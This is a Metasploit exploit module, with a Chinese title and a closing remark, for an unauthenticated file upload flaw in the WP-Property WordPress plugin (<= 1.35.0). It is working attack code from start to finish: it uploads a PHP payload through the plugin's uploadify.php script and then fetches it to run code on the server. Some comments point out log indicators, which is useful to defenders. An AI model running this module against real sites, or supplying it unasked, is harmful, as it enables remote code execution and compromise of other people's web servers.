WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

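require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (<= 1.35.0, per the module description below).
#
# The affected endpoint is the uploadify.php script bundled under
# wp-content/plugins/wp-property/third-party/uploadify/. Both #check and
# #exploit address that single path, so requests to it (and any .php file
# appearing beside it) are the events to look for in web server logs.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # The pasted listing showed this mixin as "Msf::Exploit: hpEXE"; the constant
  # is PhpEXE, matching the 'msf/core/exploit/php_exe' require above.
  include Msf::Exploit::PhpEXE

  # Registers module metadata (name, references, targets) and the TARGETURI option.
  #
  # @param info [Hash] metadata passed in by the framework and merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the plugin's uploadify.php with a single GET request.
  #
  # This is a presence test only: it does not read the plugin version or
  # attempt an upload, so Appears means "the script answered with HTTP 200",
  # not "the host is confirmed vulnerable".
  #
  # @return [Exploit::CheckCode::Unknown] when there is no response or the status is not 200
  # @return [Exploit::CheckCode::Appears] when the script answers with HTTP 200
  def check
    uri = target_uri.path
    # Make sure the base path ends in a slash before the plugin path is appended.
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  # Uploads a PHP file through uploadify.php and then requests it.
  #
  # Two requests are sent: a multipart POST to uploadify.php carrying a
  # "Filedata" file part and a "folder" part that names the uploadify
  # directory, then a GET to whatever location the upload response body
  # returns. Both are unauthenticated in this module, which is what makes the
  # sequence distinctive in access logs.
  #
  # Fails with UnexpectedReply when the upload gets no response, a non-200
  # status, or a body that does not mention the uploaded file name.
  def exploit
    uri = target_uri.path
    # Make sure the base path ends in a slash before the plugin path is appended.
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    # Random five-letter name with a .php extension for the uploaded file.
    @payload_name = "#{rand_text_alpha(5)}.php"
    # get_write_exec_payload is not defined in this file; presumably it comes
    # from the PhpEXE mixin. The :unlink_self option name suggests the dropped
    # file removes itself after running. TODO confirm against the mixin.
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Removes the bare CRLF line that precedes a "--_Part_" boundary marker in
    # the serialized message, leaving the marker at the start of its line.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body is used verbatim as the location of the uploaded file.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end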

不要问我这写的是什么 怎么利用 我是说msf.